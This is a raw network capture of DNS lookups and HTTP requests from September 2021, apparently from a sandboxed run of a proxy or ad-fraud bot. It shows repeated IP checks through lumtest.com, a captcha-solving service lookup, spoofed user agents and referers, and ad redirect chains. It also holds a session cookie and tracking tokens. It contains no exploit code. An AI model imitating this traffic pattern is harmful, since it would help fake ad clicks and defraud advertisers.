Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSs0.2mdn.netRequests0.2mdn.netIN AResponses0.2mdn.netIN CNAMEs0-2mdn-net.l.google.coms0-2mdn-net.l.google.comIN A142.250.179.198
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSs.srvsynd.comRequests.srvsynd.comIN AResponses.srvsynd.comIN A18.203.192.182s.srvsynd.comIN A18.203.130.15s.srvsynd.comIN A34.253.43.221s.srvsynd.comIN A18.203.208.193s.srvsynd.comIN A18.202.51.56s.srvsynd.comIN A34.240.212.15s.srvsynd.comIN A18.203.209.222s.srvsynd.comIN A34.251.154.165s.srvsynd.comIN A34.248.176.243s.srvsynd.comIN A52.31.191.243
-
DNSkinja-otfp.global.ssl.fastly.netRequestkinja-otfp.global.ssl.fastly.netIN AResponsekinja-otfp.global.ssl.fastly.netIN A151.101.1.194kinja-otfp.global.ssl.fastly.netIN A151.101.65.194kinja-otfp.global.ssl.fastly.netIN A151.101.129.194kinja-otfp.global.ssl.fastly.netIN A151.101.193.194
-
DNSconnatix-d.openx.netRequestconnatix-d.openx.netIN AResponseconnatix-d.openx.netIN A34.98.64.218connatix-d.openx.netIN A35.244.159.8
-
DNScapi.connatix.comRequestcapi.connatix.comIN AResponsecapi.connatix.comIN A3.142.21.38capi.connatix.comIN A18.190.140.105capi.connatix.comIN A18.116.99.40capi.connatix.comIN A18.222.54.1capi.connatix.comIN A13.59.193.64capi.connatix.comIN A3.20.211.250capi.connatix.comIN A52.15.107.106capi.connatix.comIN A3.141.186.246
-
DNSapi.bounceexchange.comRequestapi.bounceexchange.comIN AResponseapi.bounceexchange.comIN A34.117.4.53
-
DNScutpaid.comRequestcutpaid.comIN AResponsecutpaid.comIN A104.21.48.87cutpaid.comIN A172.67.183.8
-
GEThttp://cutpaid.com/lhR9RequestGET /lhR9 HTTP/1.1
Host: cutpaid.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.189 Safari/537.36 Vivaldi/1.95.1077.60
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://azfreefilm.com/movies.html?ads=9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: AppSession=de44afefb4b8c51fcbd0722e5113dff7; csrfToken=e88d85894e817e2f1c9ce54b01859a9dd1fb157d237fff86d26027d4c4ff42e1f7f9b8f62864d0d0803bec00e56733aa1169d8c85d2b203256dcb69be89a87c7
ResponseHTTP/1.1 301 Moved Permanently
Date: Mon, 06 Sep 2021 09:48:17 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 06 Sep 2021 10:48:17 GMT
Location: https://cutpaid.com/lhR9
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YVGPFeOdCaluSrdeHq19C4CoMcUMhW2AiNgWKXTkf%2FBwfpxQidtMeXFjrmr6zlfbK%2FPstKiVCKseJxMc%2BJL8NUfKshz6iQEj7bBax7cqqckfCu13Rkw9nuq%2F%2FS3Y0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6c7e21f764c79-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:18 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSs.srvsynd.comRequests.srvsynd.comIN AResponses.srvsynd.comIN A52.19.145.179s.srvsynd.comIN A18.203.130.15s.srvsynd.comIN A18.203.208.193s.srvsynd.comIN A18.203.213.28s.srvsynd.comIN A18.203.131.238s.srvsynd.comIN A34.248.176.243s.srvsynd.comIN A52.31.191.243s.srvsynd.comIN A52.212.133.238s.srvsynd.comIN A34.243.93.43s.srvsynd.comIN A52.19.198.230
-
DNSsecure.adnxs.comRequestsecure.adnxs.comIN AResponsesecure.adnxs.comIN CNAMEg.geogslb.comg.geogslb.comIN CNAMEib.anycast.adnxs.comib.anycast.adnxs.comIN A185.33.220.243ib.anycast.adnxs.comIN A185.33.221.13ib.anycast.adnxs.comIN A185.33.221.11ib.anycast.adnxs.comIN A185.33.221.15ib.anycast.adnxs.comIN A185.33.220.240ib.anycast.adnxs.comIN A185.33.221.50ib.anycast.adnxs.comIN A185.33.220.145ib.anycast.adnxs.comIN A185.33.221.14
-
DNSdfp.bouncex.netRequestdfp.bouncex.netIN AResponsedfp.bouncex.netIN A34.117.4.53
-
DNSevents.bouncex.netRequestevents.bouncex.netIN AResponseevents.bouncex.netIN A34.95.65.255
-
DNSssp.behave.comRequestssp.behave.comIN AResponsessp.behave.comIN CNAMEpool.melbourne.iponweb.netpool.melbourne.iponweb.netIN CNAMEmelbourne.geo.iponweb.netmelbourne.geo.iponweb.netIN CNAMEpool-gce-sc.melbourne.iponweb.netpool-gce-sc.melbourne.iponweb.netIN A35.207.10.239
-
DNSlangke.fr.amRequestlangke.fr.amIN AResponselangke.fr.amIN A212.107.18.203
-
DNSu.cdnwidget.comRequestu.cdnwidget.comIN AResponseu.cdnwidget.comIN A34.107.221.36
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.89millustry.topIN A13.227.222.110millustry.topIN A13.227.222.73millustry.topIN A13.227.222.102
-
DNStag-api.kinja.comRequesttag-api.kinja.comIN AResponsetag-api.kinja.comIN CNAMEtag-api.ccgateway.nettag-api.ccgateway.netIN CNAMEext-lb-aws-prod.ccgateway.netext-lb-aws-prod.ccgateway.netIN A52.91.215.149ext-lb-aws-prod.ccgateway.netIN A18.212.140.196ext-lb-aws-prod.ccgateway.netIN A3.237.175.195
-
POSThttp://langke.fr.am/adw.phpRequestPOST /adw.php HTTP/1.1
Host: langke.fr.am
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 SeaMonkey/2.49.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:48:19 GMT
Content-Length: 13728
Connection: close
-
DNSc.go-mpulse.netRequestc.go-mpulse.netIN AResponsec.go-mpulse.netIN CNAMEwildcard46.go-mpulse.net.edgekey.netwildcard46.go-mpulse.net.edgekey.netIN CNAMEe4518.dscapi7.akamaiedge.nete4518.dscapi7.akamaiedge.netIN A95.101.58.226
-
DNScutpaid.comRequestcutpaid.comIN AResponsecutpaid.comIN A104.21.48.87cutpaid.comIN A172.67.183.8
-
DNSads.stickyadstv.comRequestads.stickyadstv.comIN AResponseads.stickyadstv.comIN CNAMEip1.ads.stickyadstv.com.akadns.netip1.ads.stickyadstv.com.akadns.netIN CNAMEip2.ads.stickyadstv.com.akadns.netip2.ads.stickyadstv.com.akadns.netIN CNAMEcidr1.ads.stickyadstv.com.akadns.netcidr1.ads.stickyadstv.com.akadns.netIN CNAMEstickyadstv.com.edgekey.netstickyadstv.com.edgekey.netIN CNAMEe11676.b.akamaiedge.nete11676.b.akamaiedge.netIN A104.123.41.104
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.am5.vip.prod.criteo.comgum.am5.vip.prod.criteo.comIN A178.250.2.146
-
DNSi.kinja-img.comRequesti.kinja-img.comIN AResponsei.kinja-img.comIN CNAMEkinja-img.comkinja-img.comIN A151.101.130.166kinja-img.comIN A151.101.66.166kinja-img.comIN A151.101.2.166kinja-img.comIN A151.101.194.166
-
DNShbx.media.netRequesthbx.media.netIN AResponsehbx.media.netIN A2.16.118.158
-
DNSretributionsaloon.xyzRequestretributionsaloon.xyzIN AResponseretributionsaloon.xyzIN A34.196.13.28
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.par.vip.prod.criteo.comgum.par.vip.prod.criteo.comIN A178.250.0.157
-
GEThttp://tracking.leomob.com/track?awno=lm133&oid=3236727&devid=d3376969-9cc7-4681-b241-b5728f2a348e&aff_sub=65l969Mdt8vv0_QqtrUUAmj1HM9QdjNk&subUuid=1136301_452RequestGET /track?awno=lm133&oid=3236727&devid=d3376969-9cc7-4681-b241-b5728f2a348e&aff_sub=65l969Mdt8vv0_QqtrUUAmj1HM9QdjNk&subUuid=1136301_452 HTTP/1.1
Host: tracking.leomob.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SSB504R Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.90 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:48:24 GMT
Content-Length: 0
Connection: keep-alive
Server: Tengine/2.2.2
Location: https://ccapi.g2afse.com/click?pid=167&offer_id=1349085&sub1=postback1325399cc%257B%2522devid%2522%253A%2522d3376969-9cc7-4681-b241-b5728f2a348e%2522%252C%2522aff_sub%2522%253A%252265l969Mdt8vv0_QqtrUUAmj1HM9QdjNk%2522%252C%2522awno%2522%253A%2522lm133%2522%252C%2522subUuid%2522%253A%25221136301_452%2522%252C%2522oid%2522%253A%25223236727%2522%252C%2522awt%2522%253A%2522noinxnnkjnqwnx%2522%252C%2522rip%2522%253A%2522154.61.71.51%2522%257D&sub2=lm1331136301_452&sub5=
Content-Language: en-US
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:27 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNScsm.nl.eu.criteo.netRequestcsm.nl.eu.criteo.netIN AResponsecsm.nl.eu.criteo.netIN CNAMEcsm.am5.vip.prod.criteo.netcsm.am5.vip.prod.criteo.netIN A178.250.2.150
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150
-
DNSlangmm.infoRequestlangmm.infoIN AResponselangmm.infoIN A5.181.218.143
-
DNSkiynew.comRequestkiynew.comIN AResponsekiynew.comIN A185.162.85.3kiynew.comIN A185.162.85.19kiynew.comIN A185.162.85.20kiynew.comIN A185.162.85.14kiynew.comIN A185.162.85.2kiynew.comIN A185.162.85.1kiynew.comIN A185.162.85.4
-
GEThttp://langmm.info/a.phpRequestGET /a.php HTTP/1.1
Host: langmm.info
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:48:31 GMT
Content-Length: 13724
Connection: close
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSncsa.sdapi.ioRequestncsa.sdapi.ioIN AResponsencsa.sdapi.ioIN CNAMEn.sdapi.io.edgekey.netn.sdapi.io.edgekey.netIN CNAMEe4330.dscx.akamaiedge.nete4330.dscx.akamaiedge.netIN A104.73.134.42
-
DNSbaide.liveRequestbaide.liveIN AResponsebaide.liveIN A212.107.18.203
-
DNSantig-hra.comRequestantig-hra.comIN AResponseantig-hra.comIN A34.195.129.193antig-hra.comIN A52.73.147.241
-
DNShdpornvideo.tvRequesthdpornvideo.tvIN AResponsehdpornvideo.tvIN A104.18.31.148hdpornvideo.tvIN A104.18.30.148
-
GEThttp://antig-hra.com/zcvisitor/90606472-0ef7-11ec-8b98-12bb284c3fc5/c3eaa300-8128-11e9-9f22-0a15cb739170?campaignid=1adad010-f53d-11eb-ba4a-0a918cbcbb97&__id__=1adad010-f53d-11eb-ba4a-0a918cbcbb97RequestGET /zcvisitor/90606472-0ef7-11ec-8b98-12bb284c3fc5/c3eaa300-8128-11e9-9f22-0a15cb739170?campaignid=1adad010-f53d-11eb-ba4a-0a918cbcbb97&__id__=1adad010-f53d-11eb-ba4a-0a918cbcbb97 HTTP/1.1
Host: antig-hra.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pennews.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 500 Internal Server Error
Date: Mon, 06 Sep 2021 09:48:31 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'
x-content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'
X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline'
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Headers: X-Requested-With,Content-Type,x-exadsrtb-version,x-openrtb-version,x-zerortb-version,X-Flag
Server: ZeroPark-Traffic
-
GEThttp://kiynew.com/cuclc?aid=8880766029472746344&t=1630921673&s=127RequestGET /cuclc?aid=8880766029472746344&t=1630921673&s=127 HTTP/1.1
Host: kiynew.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.2000 Chrome/30.0.1599.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Mon, 06 Sep 2021 09:48:31 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 445
Connection: keep-alive
Location: http://u-7188.onetouch7.info/api/rtb-pops/go?id=188761598017849&sig=866a10110347febdf72ceddb3b465c&u=aHR0cHM6Ly90ZHNrZXkuY29tL3RyYWZmaWNzdGFycy1kYW8yP2Nvc3Q9e3ByaWNlfSZjdXJyZW5jeT11c2QmZXh0ZXJuYWxfaWQ9e3N1Yl9pZH0mY3JlYXRpdmVfaWQ9e2NyZWF0aXZlX2lkfSZhZF9jYW1wYWlnbl9pZD17Y2FtcGFpZ25faWR9JnNvdXJjZT17c291cmNlfSZjcGM9e2NwY30%3D
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:31 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNStsyndicate.comRequesttsyndicate.comIN AResponsetsyndicate.comIN A213.174.157.83
-
DNSntvpevnts.comRequestntvpevnts.comIN AResponsentvpevnts.comIN A168.119.25.22
-
DNSrotabol.comRequestrotabol.comIN AResponserotabol.comIN A173.214.252.142
-
POSThttp://baide.live/page.phpRequestPOST /page.php HTTP/1.1
Host: baide.live
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:48:31 GMT
Content-Length: 57786
Connection: close
-
DNScdn.cookielaw.orgRequestcdn.cookielaw.orgIN AResponsecdn.cookielaw.orgIN A104.16.148.64cdn.cookielaw.orgIN A104.16.149.64
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSiir.aiRequestiir.aiIN AResponseiir.aiIN A172.67.128.142iir.aiIN A104.21.1.54
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNStdskey.comRequesttdskey.comIN AResponsetdskey.comIN A162.251.109.64
-
DNSipp-5556.coderformylife.infoRequestipp-5556.coderformylife.infoIN AResponseipp-5556.coderformylife.infoIN A172.67.20.248ipp-5556.coderformylife.infoIN A104.22.10.55ipp-5556.coderformylife.infoIN A104.22.11.55
-
DNSstatic.bookmsg.comRequeststatic.bookmsg.comIN AResponse
-
DNScam4-static.xcdnpro.comRequestcam4-static.xcdnpro.comIN AResponsecam4-static.xcdnpro.comIN CNAMEcam4-static.xcdnpro.com.sds.rncdn7.comcam4-static.xcdnpro.com.sds.rncdn7.comIN A64.210.158.68cam4-static.xcdnpro.com.sds.rncdn7.comIN A64.210.158.70cam4-static.xcdnpro.com.sds.rncdn7.comIN A64.210.158.72
-
DNSdev.visualwebsiteoptimizer.comRequestdev.visualwebsiteoptimizer.comIN AResponsedev.visualwebsiteoptimizer.comIN A34.96.102.137
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSbkl72.comRequestbkl72.comIN AResponsebkl72.comIN A104.21.91.192bkl72.comIN A172.67.178.94
-
DNSjs.wpushsdk.comRequestjs.wpushsdk.comIN AResponsejs.wpushsdk.comIN CNAMEcdn28786515.ahacdn.mecdn28786515.ahacdn.meIN A213.174.135.25cdn28786515.ahacdn.meIN A213.174.135.24
-
DNSqihuu.netRequestqihuu.netIN AResponseqihuu.netIN A5.181.218.143
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.73millustry.topIN A13.227.222.89millustry.topIN A13.227.222.102millustry.topIN A13.227.222.110
-
DNS51789.ruRequest51789.ruIN AResponse51789.ruIN A212.107.18.203
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627548&t=81655a7ddc4187e1&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627548&t=81655a7ddc4187e1&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.25 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627548
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:48:36 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
POSThttp://qihuu.net/adv.htmlRequestPOST /adv.html HTTP/1.1
Host: qihuu.net
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:48:36 GMT
Content-Length: 13730
Connection: close
-
GEThttp://millustry.top/redirect?tid=927574RequestGET /redirect?tid=927574 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; Touch; WebView/1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:48:36 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=21ca0100-47ea-4af2-951f-467551d828b7
Location: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGN4Tm54bVpqVTJNRE16WlRZNFpXWXhObUUzTlRGak1XVTJZV0V3WXpZMFlUVTNaUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1wb3JuaHViLGJpZCxhZHYscGhwJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablRPbmRLNlYwcnFyYlhTdWxkSzZaMHJwWFN1bGRNNlYwcnBYVjFhYTFWeTNUYWFjVGNhMGE2YjUwVVMyV3owMDhWejJ1cmwwbXpxNDRzdW9ycWxwejI0bG9tbnRzbHAxbjBxMjJkZFBaVlpTNFFTQTZQcEhwM3M1enBYU3VsZE5LNlYwcnBYU3VsY0gyQS0tfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTMxMjk0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8NDU3MDAwNnw1ODkxOTAxNHwyfDF8MHwwfDU4OHw5Mjc1NzR8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDY1YmM1NjA5MWJiZjFmYzNjYmVhMzMwNzgyNDRmNjI4fDYwYjFhNWZmNzkzNjUwNGFkZjAzMTI4NzA0YzJiNWRkfDF8MHxwb3JuaHViLmJpZHwwfDB8MHwwLjEyfDF8MHxleGNoYW5nZV9saW5rfDB8MHwwfC0xfDB8MHx8fDJ8NzIwfHwwfDB8MHwxMHwwfDB8MXwwfE9LfGFkZWJmOWYzZDZhMzE0MDkyZGE5NGZmOTM2OWY3ZDJi
X-Cache: Miss from cloudfront
Via: 1.1 f5e34f7c59830a3caffb7df5f36b4daf.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: vto85jYs-F94LlXBSsVK8RKqJjN-7AnY1KpSxZQwrbRgVcsOR5TZEA==
-
DNScapi.connatix.comRequestcapi.connatix.comIN AResponsecapi.connatix.comIN A18.222.54.1capi.connatix.comIN A18.224.231.234capi.connatix.comIN A3.20.211.250capi.connatix.comIN A13.59.193.64capi.connatix.comIN A18.116.179.127capi.connatix.comIN A52.14.23.146capi.connatix.comIN A18.190.140.105capi.connatix.comIN A18.116.246.48
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:39 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNScdn.cookielaw.orgRequestcdn.cookielaw.orgIN AResponsecdn.cookielaw.orgIN A104.16.148.64cdn.cookielaw.orgIN A104.16.149.64
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNScdn.adf.lyRequestcdn.adf.lyIN AResponsecdn.adf.lyIN A172.67.19.54cdn.adf.lyIN A104.20.82.199cdn.adf.lyIN A104.20.81.199
-
DNSvenetrigni.comRequestvenetrigni.comIN AResponsevenetrigni.comIN A52.45.132.150venetrigni.comIN A3.209.145.5
-
DNSdeliverytraffico.comRequestdeliverytraffico.comIN AResponsedeliverytraffico.comIN A198.211.107.77
-
DNSdeliverytraffico.comRequestdeliverytraffico.comIN AResponsedeliverytraffico.comIN A198.211.107.77
-
